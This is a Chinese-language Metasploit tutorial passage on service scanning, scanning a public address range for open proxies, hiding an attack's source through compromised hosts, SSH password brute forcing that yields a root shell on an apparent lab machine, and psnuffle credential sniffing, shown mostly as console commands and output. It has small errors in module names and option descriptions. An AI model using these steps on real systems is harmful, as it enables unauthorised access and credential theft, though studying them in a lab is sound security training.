metasploit 情報蒐集技術【3】服務掃描、查點、口令猜解與嗅探

1、服務掃描

服務查點：利用蒐集到的開放的端口運行的服務進行深入挖掘
metasploit中有許多相關工具，大部分都在Scanner輔助模塊
常以[service_name]_version（用以遍歷主機，確定服務版本）
[service_name]_login（進行口令探測攻擊）命名
可輸入 search name:_version查看所有服務查點模塊

網絡服務掃描
①telent服務掃描

msf > use auxiliary/scanner/telent/telent_version
msf auxiliary(ftp_version) > set rhosts 10.10.10.0/24
rhosts => 10.10.10.0/24
msf auxiliary(ftp_version) > set threads 100
threads => 100
msf auxiliary(ftp_version) > run

②SSH服務掃描

msf > use auxiliary/scanner/ssh/ssh_version

③Oracle數據庫服務查點

msf auxiliary(ssh_version) > use auxiliary/scanner/oracle/tnslsnr_version

④開放代理探測與利用
隱藏網絡身份的技術很多，比如代理服務器（Proxy）、VPN等
open_proxy模塊

msf auxiliary(tnslsnr_version) > use auxiliary/scanner/http/open_proxy

公開蒐集的代理服務器安全性無法得到保障。
隱藏攻擊源的方法：可以從公開渠道蒐集到一些免費的VPN服務，也可以自己在已控制的主機上架設OpenVPN服務

msf > use auxiliary/scanner/http/open_proxy
msf auxiliary(open_proxy) > set SITE www.google.com
SITE => www.google.com
msf auxiliary(open_proxy) > set RHOSTS 24.25.24.1-24.25.26.254
RHOSTS => 24.25.24.1-24.25.26.254
msf auxiliary(open_proxy) > set MULTIPORTS true
MULTIPORTS => true
msf auxiliary(open_proxy) > set VERIFY_CONNECT true
VERIFY_CONNECT => true
msf auxiliary(open_proxy) > set THREADS 100
THREADS => 100
msf auxiliary(open_proxy) > run

[*] Scanned  99 of 766 hosts (12% complete)
[*] Scanned 186 of 766 hosts (24% complete)
[*] Scanned 236 of 766 hosts (30% complete)
[*] Scanned 327 of 766 hosts (42% complete)
[*] Scanned 416 of 766 hosts (54% complete)
[*] Scanned 472 of 766 hosts (61% complete)
[*] Scanned 550 of 766 hosts (71% complete)
[*] Scanned 636 of 766 hosts (83% complete)
[*] Scanned 694 of 766 hosts (90% complete)
[*] Scanned 766 of 766 hosts (100% complete)
[*] Auxiliary module execution completed

2、口令猜解與嗅探

製作一本質量高的字典需要運用社工
1、SSH服務口令猜測
查找到SSH服務，用ssh_login模塊對SSH服務進行口令試探攻擊，需要一個好的用戶名和口令字典
USERNAME指定一個用戶名 USER_FILE指定用戶名字典
PASSWORD指定一個用戶名 PASS_FILE指定用戶名字典

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 10.10.10.254
rhosts => 10.10.10.254
msf auxiliary(ssh_login) > set username root
username => root
msf auxiliary(ssh_login) > set PASS_FILE /root/words.txt
PASS_FILE => /root/words.txt
msf auxiliary(ssh_login) > set THREADS 50
THREADS => 50
msf auxiliary(ssh_login) > run

[*] SSH - Starting bruteforce
[-] SSH - Failed: 'root:'
[!] No active DB -- Credential data will not be saved!
[-] SSH - Failed: 'root:sadsa'
[-] SSH - Failed: 'root:asfgdssaas'
[-] SSH - Failed: 'root:sadasdf'
[-] SSH - Failed: 'root:we132dds'
[-] SSH - Failed: 'root:root'
[+] SSH - Success: 'root:ubuntu' 'uid=0(root) gid=0(root) groups=0(root) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 1 opened (10.10.10.128:36651 -> 10.10.10.254:22) at 2017-09-11 22:12:18 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

2、psnuffle口令嗅探
psnuffle是metasploit中的口令嗅探工具，只有在接入對方網絡的初始訪問點後才能進行嗅探。

msf auxiliary(ssh_login) > use auxiliary/sniffer/psnuffle
msf auxiliary(psnuffle) > run
[*] Auxiliary module execution completed

[*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...
msf auxiliary(psnuffle) > [*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb...
[*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
[*] Failed FTP Login: 10.10.10.254:57922-10.10.10.129:21 >> msfadmin / msfadmin
[*] Failed FTP Login: 10.10.10.254:57922-10.10.10.129:21 >> msfadmin /